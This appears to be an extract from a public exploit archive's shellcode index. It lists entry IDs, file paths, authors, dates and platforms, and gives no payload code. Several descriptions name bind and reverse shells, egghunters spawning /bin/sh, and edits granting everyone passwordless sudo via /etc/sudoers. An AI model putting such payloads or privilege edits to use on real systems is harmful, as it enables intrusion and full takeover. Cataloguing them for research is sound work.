44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm

1 id file description date author type platform
872 42992 shellcodes/windows_x86-64/42992.c Windows/x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
873 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86
874 44321 shellcodes/linux_x86/44321.c Linux/x86 - execve(/bin/sh) Shellcode (18 bytes) 2018-03-20 Anurag Srivastava shellcode linux_x86
875 44334 shellcodes/linux_x86/44334.c Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes) Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes) 2018-03-23 Anurag Srivastava shellcode linux_x86
876 44445 shellcodes/generator/44445.py Linux/x64 - x64 Assembly Shellcode (Generator) 2018-04-11 0x4ndr3 shellcode generator
877 44505 shellcodes/linux_x86/44505.c Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes) 2018-04-24 Anurag Srivastava shellcode linux_x86
878 44507 shellcodes/linux_x86/44507.c Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes) 2018-04-24 absolomb shellcode linux_x86
888 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
889 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86
890 44791 shellcodes/linux_x86/44791.c Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes) 2018-05-28 Luca shellcode linux_x86
891 44807 shellcodes/linux_x86/44807.c Linux/x86 - EggHunter + access() Shellcode (38 bytes) Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
892 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes) Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
893 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes) Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm